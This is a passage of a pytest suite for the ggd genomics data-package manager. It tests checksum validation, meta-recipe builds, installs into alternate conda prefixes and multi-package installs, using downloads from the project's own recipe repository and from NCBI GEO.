# ggd_jdict = install.check_ggd_recipe(recipe,"genomics")
#
# temp_stdout = StringIO()
# with redirect_stdout(temp_stdout):
# install.install_checksum([recipe],ggd_jdict)
# output = temp_stdout.getvalue().strip()
# assert ":ggd:install: Checksum for grch37-chromsizes-ggd-v1" in output
# assert ":ggd:checksum: installed file checksum: grch37-chromsizes-ggd-v1.txt checksum: 9035fb43d5341584a8b11fb70de3fae5" in output
# assert ":ggd:checksum: metadata checksum record: grch37-chromsizes-ggd-v1.txt checksum: 9035fb43d5341584a8b11fb70de3fae5" in output
# assert ":ggd:install: ** Successful Checksum **" in output
#
#
# try:
# args = Namespace(channel='genomics', command='uninstall', names=[recipe])
# uninstall.uninstall((),args)
# except:
# pass
def test_install_checksum_meta_recipe():
"""
Test the the checksum is skipped when installing a meta-recipe
"""
pytest_enable_socket()
import tempfile
from ggd import check_recipe
tmpdir = tempfile.mkdtemp()
recipe_path = os.path.join(tmpdir, "gse123-geo-v1")
os.mkdir(recipe_path)
## Download files
try:
## checkusm
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
"--directory-prefix",
recipe_path])
## meta.yaml
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
"--directory-prefix",
recipe_path])
## metarecipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
"--directory-prefix",
recipe_path])
## head parser
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
"--directory-prefix",
recipe_path])
## Post link
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
"--directory-prefix",
recipe_path])
## recipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
"--directory-prefix",
recipe_path])
except sp.CalledProcessError as e:
print(str(e))
assert False
## update the name
for f in os.listdir(recipe_path):
content = [x.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1") for x in open(os.path.join(recipe_path,f))]
with open(os.path.join(recipe_path,f), "w") as out:
out.write("".join(content))
## Set env vars
env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()
## Set environ vars
os.environ["GGD_METARECIPE_ID"] = "GSE123"
os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files
## Get yaml file
yaml_file = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))
tarball_file_path = check_recipe._build(recipe_path,yaml_file)
assert os.path.isfile(tarball_file_path)
## Install recipe
assert check_recipe._install(tarball_file_path, "gse123-geo-v1") == True
## Remove the temp directories
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
if os.path.exists(env_var_tmp_dir):
shutil.rmtree(env_var_tmp_dir)
## Get recipe info
meta_recipe = "gse123-geo-v1"
parent_meta_recipe = "meta-recipe-geo-accession-geo-v1"
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'gse123-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/gse123-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GSE123 GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
## Test wihtout parent_name
try:
install.install_checksum(pkg_names = [meta_recipe],
ggd_jdict = ggd_jdict,
prefix = utils.conda_root(),
meta_recipe = True,
meta_recipe_name = "")
assert False
except AssertionError as e:
assert ":ggd:install: !!ERROR!! Unable to preform checksum on a meta-recipe without the parent meta-recipe name" in str(e)
## Test good checksum
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install_checksum(pkg_names = [meta_recipe],
ggd_jdict = ggd_jdict,
prefix = utils.conda_root(),
meta_recipe = True,
meta_recipe_name = parent_meta_recipe)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Initiating data file content validation using checksum" in output
assert ":ggd:install: Checksum for {}".format(meta_recipe) in output
assert ":ggd:install: NOTICE: Skipping checksum for meta-recipe {} => {}".format(parent_meta_recipe, meta_recipe) in output
sp.check_call(["ggd","uninstall","gse123-geo-v1"])
def test_copy_pkg_files_to_prefix():
"""
Test that the copy_pkg_files_to_prefix method correctly copies the tarball and pkg files from the current
conda environment to the target prefix
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env6")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env6"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env6"])
### Install the recipe
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.install_from_cached([ggd_recipe], ggd_channel,jdict,prefix=temp_env) == True
## Test a prefix that is the same and the conda root returns False
assert install.copy_pkg_files_to_prefix(utils.conda_root(),[ggd_recipe]) == False
## Extra info
data_packages = get_conda_package_list(temp_env)
version = str(data_packages[ggd_recipe]["version"])
build = str(data_packages[ggd_recipe]["build"])
## Test that the files were properly copied
tarfile = "{}-{}-{}.tar.bz2".format(ggd_recipe,version,build)
pkgdir = "{}-{}-{}".format(ggd_recipe,version,build)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile)) == True
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir)) == True
## Remove them from the target prefix
os.remove(os.path.join(temp_env,"pkgs",tarfile))
shutil.rmtree(os.path.join(temp_env,"pkgs",pkgdir))
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile)) == False
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir)) == False
### Test the function passes
assert install.copy_pkg_files_to_prefix(temp_env,[ggd_recipe]) == True
### Test the files are correct
assert os.path.isfile(os.path.join(utils.conda_root(),"pkgs",tarfile))
assert os.path.isdir(os.path.join(utils.conda_root(),"pkgs",pkgdir))
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env6"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_non_prefix_capable_package():
"""
Test a package that is not able to be installed with --prefix is proper handled
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "non_prefix_capable")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "non_prefix_capable"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
## Test a good install into a designated prefix
### Create the temp environment
sp.check_output(["conda", "create", "--name", "non_prefix_capable"])
## Test a package that is not set up to be installed with the --prefix flag
args = Namespace(channel='genomics', command='install', debug=False, name=["danrer10-gtf-ensembl-v1"], file=[] ,prefix=temp_env, id = None)
with pytest.raises(AssertionError) as pytest_wrapped_e:
install.install((), args)
assert pytest_wrapped_e.match(":ggd:install: !!ERROR!! the --prefix flag was set but the 'danrer10-gtf-ensembl-v1' data package is not set up to be installed into a different prefix. GGD is unable to fulfill the install request. Remove the --prefix flag to install this data package. Notify the ggd team if you would like this recipe to be updated for --prefix install compatibility")
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "non_prefix_capable"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_install_main_function():
"""
Test the main install function
"""
pytest_enable_socket()
remove_pfam()
CONDA_ROOT = utils.conda_root()
## Test empty name and file parametres
args = Namespace(channel='genomics', command='install', debug=False, name=[], file=[] ,prefix=None, id = None)
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
assert pytest_wrapped_e.match(":ggd:install: !!ERROR!! Either a data package name or a file name with --file is required. Neither option was provided.") ## Check that the exit code is 1
## Test bad --file parametres
args = Namespace(channel='genomics', command='install', debug=False, name=[], file=["FaKe_FilE.Txt"] ,prefix=None, id = None)
try:
install.install((), args)
assert False
except AssertionError as e:
assert ":ggd:install: !!ERROR!! The FaKe_FilE.Txt file provided does not exists" in str(e)
except Exception as e:
print(str(e))
assert False
## Test a non ggd recipe
ggd_recipe1 = "Fake-hg19-gaps"
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe1], file=[] ,prefix=None, id = None)
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
## Install pfam
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install((), args)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: hg19-pfam-domains-ucsc-v1 version 1 is not installed on your system" in output
assert ":ggd:install: hg19-pfam-domains-ucsc-v1 has not been installed by conda" in output
assert ":ggd:install: The hg19-pfam-domains-ucsc-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
assert ":ggd:install: Attempting to install the following cached package(s):\n\thg19-pfam-domains-ucsc-v1" in output
assert ":ggd:utils:bypass: Installing hg19-pfam-domains-ucsc-v1 from the ggd-genomics conda channel" in output
assert ":ggd:install: Updating installed package list" in output
assert ":ggd:install: Install Complete" in output
assert ":ggd:install: Installed file locations" in output
assert ":ggd:install: Environment Variables" in output
## Test an already installed ggd recipe
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install((), args)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: 'hg19-pfam-domains-ucsc-v1' is already installed." in output
assert "You can find hg19-pfam-domains-ucsc-v1 here:" in output
assert ":ggd:install: hg19-pfam-domains-ucsc-v1 version 1 is not installed on your system" not in output
## Test a previously installed recipe, but the recipe path is broken
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=None, id = None)
jdict = install.check_ggd_recipe(ggd_recipe,"genomics")
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
path = os.path.join(CONDA_ROOT,"share","ggd",species,build,ggd_recipe,version)
for f in os.listdir(path):
os.remove(os.path.join(path,f))
os.rmdir(path)
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
remove_pfam()
def test_install_main_function_multiple_recipes():
"""
Test main function with mutliple recipe requests
"""
pytest_enable_socket()
remove_pfam()
CONDA_ROOT = utils.conda_root()
## Test install with mutliple packages
recipes = ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = None)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install((), args)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: The grch37-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
assert ":ggd:install: hg19-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: hg19-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: The hg19-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch37-chromsizes-ggd-v1\n\thg19-chromsizes-ggd-v1" in output
assert ":ggd:utils:bypass: Installing grch37-chromsizes-ggd-v1, hg19-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
assert ":ggd:install: Updating installed package list" in output
assert ":ggd:install: Install Complete" in output
assert ":ggd:install: Installed file locations" in output
assert ":ggd:install: Environment Variables" in output
for name in recipes:
jdict = install.check_ggd_recipe(name,"genomics")
species = jdict["packages"][name]["identifiers"]["species"]
build = jdict["packages"][name]["identifiers"]["genome-build"]
version = jdict["packages"][name]["version"]
file1 = "{}.txt".format(name)
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
for name in recipes:
try:
args = Namespace(channel='genomics', command='uninstall', names=[name])
uninstall.uninstall((),args)
except:
pass
## Test install with mutliple packages with --files
recipes = ["grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=[], file=recipes, prefix=None, id = None)
## Catch bad file
try:
install.install((),args)
assert False
except AssertionError as e:
assert ":ggd:install: !!ERROR!! The grch38-chromsizes-ggd-v1 file provided does not exists" in str(e)
except Exception:
assert False
### Create install file
install_file = CreateRecipe(
"""
install_path:
install.txt: |
grch38-chromsizes-ggd-v1
hg38-chromsizes-ggd-v1
""", from_string=True)
install_file.write_recipes()
install_file_dir_path = install_file.recipe_dirs["install_path"]
install_file_path = os.path.join(install_file_dir_path,"install.txt")
args = Namespace(channel='genomics', command='install', debug=False, name=[], file=[install_file_path], prefix=None, id = None)
## Try good file
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install((), args)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: grch38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: grch38-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: The grch38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
assert ":ggd:install: hg38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: hg38-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: The hg38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch38-chromsizes-ggd-v1\n\thg38-chromsizes-ggd-v1" in output
assert ":ggd:utils:bypass: Installing grch38-chromsizes-ggd-v1, hg38-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
assert ":ggd:install: Updating installed package list" in output
assert ":ggd:install: Install Complete" in output
assert ":ggd:install: Installed file locations" in output
assert ":ggd:install: Environment Variables" in output
for name in recipes:
jdict = install.check_ggd_recipe(name,"genomics")
species = jdict["packages"][name]["identifiers"]["species"]
build = jdict["packages"][name]["identifiers"]["genome-build"]
version = jdict["packages"][name]["version"]
file1 = "{}.txt".format(name)
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
for name in recipes:
try:
args = Namespace(channel='genomics', command='uninstall', names=[name])
uninstall.uninstall((),args)
except:
pass
## Reduce test time
## ## Test install with multiple files
## install_file2 = CreateRecipe(
## """
## install_path2:
## install2.txt: |
## grch37-chromsizes-ggd-v1
##
## install3.txt: |
## hg19-chromsizes-ggd-v1
## """, from_string=True)
## install_file2.write_recipes()
## install_file2_dir_path = install_file2.recipe_dirs["install_path2"]
## install_file2_path = os.path.join(install_file2_dir_path,"install2.txt")
## install_file3_path = os.path.join(install_file2_dir_path,"install3.txt")
## args = Namespace(channel='genomics', command='install', debug=False, name=[], file=[install_file2_path,install_file3_path], prefix=None)
## ## Try good file
## temp_stdout = StringIO()
## with redirect_stdout(temp_stdout):
## install.install((), args)
## output = temp_stdout.getvalue().strip()
## assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The grch37-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: hg19-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: hg19-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The hg19-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch37-chromsizes-ggd-v1\n\thg19-chromsizes-ggd-v1" in output
## assert ":ggd:utils:bypass: Installing grch37-chromsizes-ggd-v1, hg19-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
## assert ":ggd:install: Updating installed package list" in output
## assert ":ggd:install: Install Complete" in output
## assert ":ggd:install: Installed file locations" in output
## assert ":ggd:install: Environment Variables" in output
##
## for name in ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]:
## jdict = install.check_ggd_recipe(name,"genomics")
## species = jdict["packages"][name]["identifiers"]["species"]
## build = jdict["packages"][name]["identifiers"]["genome-build"]
## version = jdict["packages"][name]["version"]
## file1 = "{}.txt".format(name)
## assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
## assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
## for name in ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1","grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]:
## try:
## args = Namespace(channel='genomics', command='uninstall', names=[name])
## uninstall.uninstall((),args)
## except:
## pass
##
##
## ## Test install with mutliple packages with positional arguments and --files
## recipes = ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]
## args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[install_file_path], prefix=None)
## temp_stdout = StringIO()
## with redirect_stdout(temp_stdout):
## install.install((), args)
## output = temp_stdout.getvalue().strip()
## assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The grch37-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: hg19-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: hg19-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The hg19-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: grch38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: grch38-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The grch38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: hg38-chromsizes-ggd-v1 version 1 is not installed on your system" in output
## assert ":ggd:install: hg38-chromsizes-ggd-v1 has not been installed by conda" in output
## assert ":ggd:install: The hg38-chromsizes-ggd-v1 package is uploaded to an aws S3 bucket. To reduce processing time the package will be downloaded from an aws S3 bucket" in output
## assert ":ggd:install: Attempting to install the following cached package(s):\n\tgrch37-chromsizes-ggd-v1\n\tgrch38-chromsizes-ggd-v1\n\thg19-chromsizes-ggd-v1\n\thg38-chromsizes-ggd-v1" in output
## assert ":ggd:utils:bypass: Installing grch37-chromsizes-ggd-v1, grch38-chromsizes-ggd-v1, hg19-chromsizes-ggd-v1, hg38-chromsizes-ggd-v1 from the ggd-genomics conda channel" in output
## assert ":ggd:install: Updating installed package list" in output
## assert ":ggd:install: Install Complete" in output
## assert ":ggd:install: Installed file locations" in output
## assert ":ggd:install: Environment Variables" in output
##
## for name in ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1","grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]:
## jdict = install.check_ggd_recipe(name,"genomics")
## species = jdict["packages"][name]["identifiers"]["species"]
## build = jdict["packages"][name]["identifiers"]["genome-build"]
## version = jdict["packages"][name]["version"]
## file1 = "{}.txt".format(name)
## assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
## assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1))
##
## for name in ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1","grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]:
## try:
## args = Namespace(channel='genomics', command='uninstall', names=[name])
## uninstall.uninstall((),args)
## except:
## pass
def test_install_main_function_with_prefix_set():
"""
Test the main install function with the prefix flag set
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env7")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env7"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
ggd_channel="genomics"
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=temp_env, id = None)
## Test that an environemnt that doesn't exist is probably handeld
try:
install.install((), args)
## If it passes then there is an error
assert False
except CondaEnvironmentNotFound as e:
pass
except Exception as e:
assert False
## Test a good install into a designated prefix
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env7"])
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
assert install.install((), args) == True
### Test the file exists in the correct prefix and not the current prefix
file1 = "{}.bed12.bed.gz".format(ggd_recipe)
file2 = "{}.bed12.bed.gz.tbi".format(ggd_recipe)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file2)) == False
assert "CONDA_SOURCE_PREFIX" in os.environ
## Test that the tarfile and the pkg dir were correctly copied to the prefix
data_packages = get_conda_package_list(temp_env)
version = str(data_packages[ggd_recipe]["version"])
build_number = str(data_packages[ggd_recipe]["build"])
tarfile = "{}-{}-{}.tar.bz2".format(ggd_recipe,version,build_number)
pkgdir = "{}-{}-{}".format(ggd_recipe,version,build_number)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env7"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
## Test using environment short name
### Temp conda environment
env_name = "temp_env_with_name"
temp_env = os.path.join(utils.conda_root(), "envs", env_name)
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", env_name])
try:
shutil.rmtree(temp_env)
except Exception:
pass
## Test a good install into a designated prefix
### Create the temp environment
sp.check_output(["conda", "create", "--name", env_name])
## Install
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
ggd_channel="genomics"
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
args = Namespace(channel='genomics', command='install', debug=False, name=[ggd_recipe], file=[], prefix=env_name, id = None)
assert install.install((), args) == True
### Test the file exists in the correct prefix and not the current prefix
file1 = "{}.bed12.bed.gz".format(ggd_recipe)
file2 = "{}.bed12.bed.gz.tbi".format(ggd_recipe)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file2)) == False
assert "CONDA_SOURCE_PREFIX" in os.environ
## Test that the tarfile and the pkg dir were correctly copied to the prefix
data_packages = get_conda_package_list(temp_env)
version = str(data_packages[ggd_recipe]["version"])
build_number = str(data_packages[ggd_recipe]["build"])
tarfile = "{}-{}-{}.tar.bz2".format(ggd_recipe,version,build_number)
pkgdir = "{}-{}-{}".format(ggd_recipe,version,build_number)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", env_name])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_install_meta_recipe():
pytest_enable_socket()
import tarfile
import tempfile
from ggd import check_recipe
tmpdir = tempfile.mkdtemp()
recipe_path = os.path.join(tmpdir,"meta-recipe-geo-accession-geo-v1")
os.mkdir(recipe_path)
## Download files
try:
## checkusm
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
"--directory-prefix",
recipe_path])
## meta.yaml
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
"--directory-prefix",
recipe_path])
## metarecipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
"--directory-prefix",
recipe_path])
## head parser
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
"--directory-prefix",
recipe_path])
## Post link
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
"--directory-prefix",
recipe_path])
## recipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
"--directory-prefix",
recipe_path])
except sp.CalledProcessError as e:
print(str(e))
assert False
## Original yaml
orig_yaml = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))
tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
assert os.path.isfile(tarball_file_path)
## Test install good install with meta-recipe
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = "GSE123")
## Test install with a meta-recipe but no id
assert install.install((), args)
## Check for update in the ecipe and yaml files
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(utils.conda_root(),"pkgs",os.path.basename(tarball_file_path.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1"))), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] != orig_yaml["package"]["name"]
assert yaml_dict["package"]["name"] == "gse123-geo-v1"
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
